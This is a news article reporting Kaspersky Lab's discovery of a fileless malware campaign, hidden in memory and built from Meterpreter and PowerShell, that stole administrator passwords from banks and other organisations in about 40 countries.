Revealed: Malware that skulks in memory, invisibly collecting sysadmins' passwords

APT tactics deployed by mystery cybercrooks unveiled

Cybercriminals have hit scores of enterprises in 40 countries using hidden malware.

Banks, telecommunication companies and government organisations in the US, South America, Europe and Africa have already been hit by the ongoing (and stealthy) attacks.

Kaspersky Lab experts report that the attacks harness widely available penetration-testing and administration tools as well as the PowerShell framework for task automation in Windows. Malicious code resides only in memory, they say.

Hackers behind the attack have apparently taken pains to avoid writing files onto the hard drive of compromised PCs, a tactic designed to foil both whitelisting technologies and post-breach forensic analysis. The crooks are using anti-forensic techniques uncommon in everyday assaults.

"The attackers stay around just long enough to gather information before their traces are wiped from the system on the first reboot," according to Kaspersky Lab boffins.

Kaspersky Lab experts were set on the trail on the malware campaign by "banks in CIS which had found the penetration-testing software, Meterpreter, now often used for malicious purposes, in the memory of their servers when it was not supposed to be there". The Meterpreter code was combined with a number of legitimate PowerShell scripts and other utilities. The combined tools had been adapted into malicious code that could hide in the memory, invisibly collecting the passwords of system administrators.

The ultimate goal of the attack appears to be access to financial processes. Kaspersky Lab subsequently discovered that the same types of attack were occurring on an industrial scale worldwide, hitting more than 140 enterprise networks in a range of business sectors, with most victims located in the US, France, Ecuador, Kenya, the UK and Russia.

It's unclear who is behind the attacks. "The use of open source exploit code, common Windows utilities and unknown domains makes it almost impossible to determine the group responsible – or even whether it is a single group or several groups sharing the same tools," according to Kaspersky Lab.

Known groups that have the most similar approaches are GCMAN and Carbanak, who therefore both count as suspects.

Details of the second part of the operation, showing how the attackers implemented unique tactics to withdraw money through ATMs are due to be presented at Kaspersky Lab's Security Analyst Summit in April. ®

Similar topics

Other stories you might like

Biting the hand that feeds IT © 1998–2021